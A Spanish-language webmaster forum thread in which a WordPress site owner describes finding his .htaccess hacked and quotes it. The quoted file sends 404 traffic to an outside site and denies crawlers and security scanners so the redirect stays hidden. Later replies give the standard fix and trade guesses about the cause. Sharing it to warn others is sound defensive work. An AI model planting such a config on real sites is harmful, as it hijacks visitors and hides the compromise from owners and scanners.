Hackeo de .htaccess: cómo detectarlo y solucionarlo

Alan Seguir

Iota
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
Desde
6 Abr 2009
Mensajes
2.261
Hoola chicos! Sucede que hace unos momentos estaba revisando las estadísticas de mi sitio PortalMovil.net en Google Anañytics y encontré un enorme bajón en las visitas a partir del pasado Lunes 2 de noviembre hasta hoy.

Extrañado, pensé que era alguna penalización o algo así pero corroboré que el sitio sigue apareciendo entre los resultados de Google por lo que fui a revisar la web y encontré que al momento de acceder al sitio todo se mostraba normal, pero al entrar a un post redirigía a este sitio: Enlace eliminado

Me alarmó mucho y fui a revisar los ficheros del theme pero no encontre nada extraño, aunque recordé que hace unas semanas atrás extrañamente el fichero .htaccess del sitio había desaparecido sin más y en los posts salía el error 404 de HostGator. Así pues accedí por FTP a la raiz del dominio y grande fue mi sorpresa al abrir el fichero .htaccess que estaba ahí, contenía esto:

Insertar CODE, HTML o PHP:
ErrorDocument 404 http://www.cashpoint.com.au/c3dfd5/online
order allow,deny
deny from .netcraft.com
deny from 194.72.238
deny from .googlebot.com
deny from .verisign.com
deny from .aol.com
deny from .msn.com
deny from .internetidentity.com
deny from .yahoo.net
deny from .ask.com
deny from 192.92.126.135
deny from 64.
deny from 66.
deny from 76.
deny from 209.
allow from all
Obviamente había sido víctima de algún hackeo aunque pienso que no fue a mi cuenta de FTP "maestra" (que tiene acceso a todos los directorios de mi hosting en donde por supuesto están alojados todos mis sitios), sino que fue a la cuenta FTP específica para ese dominio y que solo da acceso a la raiz del mismo.

Lo comento por que si hay alguien del foro al que le haya sucedido algo igual, revise primero el fichero .htaccess de su sitio para ver si todo está normal. Yo por el momento cambié la contraseña de la cuenta FTP que al parecer es la afectada y voy a hablar con un amigo que era el único que sabía la contraseña de la misma, tal vez él la haya perdido o algo así.

P.D. El problema lo solucioné corrigiendo el fichero .htaccess con las directrices que WP necesita para funcionar con permalinks amigables, que es ésta:

Insertar CODE, HTML o PHP:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
 
Última edición:

juliofranco

Eta
Social Media
Verificado por Whatsapp
Desde
9 Ago 2009
Mensajes
1.277
Gracias por la info.
Pero claro que estas cosas asustan, mientras unos trabajamos duro otros hijuemadres hackean blogs.
 

liak

Beta
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
7 Abr 2009
Mensajes
127
quizás el archivo .htaccess tenía permisos 777 y eso pudo causar el probelma?
 

GnDx

Iota
Desde
6 Abr 2009
Mensajes
2.131
A mi me paso por medio de un bug de wordpres... en la version 2.8.4 dando acceso al wp_settings y de hay a moverle a todo el sitio....
 

Herrerix

Eta
Domainer
Desde
29 Jun 2009
Mensajes
1.395
Capaz que mis visitas sean 10K y por eso solo tengo 1,2K (i)


Uhhh, yo creo que fue un bug de Wordpress :p, que bueno que lo solucionaste Alan
 

Alan

Iota
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
Desde
6 Abr 2009
Mensajes
2.261
Pues no se si sea de WordPress, al menos no el que dicen del 2.8.4 porque desde que salió el 2.8.5 actualicé todos mis sitios enseguida.

Anyway, lo compartí con todos en caso de que lleguen a sufrir una situación similar =S
 

Cristhian

Eta
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
Desde
6 Abr 2009
Mensajes
1.343
Gracias por el dato amigo, lo tendré en cuenta ;)
 

Aldo

Épsilon
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
21 Ago 2009
Mensajes
752
Gracias por el dato... hay que tener cuidado, la otra ves me sucedio algo similar pero me metieorn un de esos archivos .php que puedes tener acceso a todo.. creo que se llama xploit o exploit
 

mryin

Gamma
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
16 May 2009
Mensajes
494
quizás el archivo .htaccess tenía permisos 777 y eso pudo causar el probelma?
que permisos deberia tener el htaccess?

Pues no se si sea de WordPress, al menos no el que dicen del 2.8.4 porque desde que salió el 2.8.5 actualicé todos mis sitios enseguida.

Anyway, lo compartí con todos en caso de que lleguen a sufrir una situación similar =S

gracias Alan. por compartir esto, estare revisando los htaccess de mis blog haber si todo anda normal. Muchas gracias
 
Arriba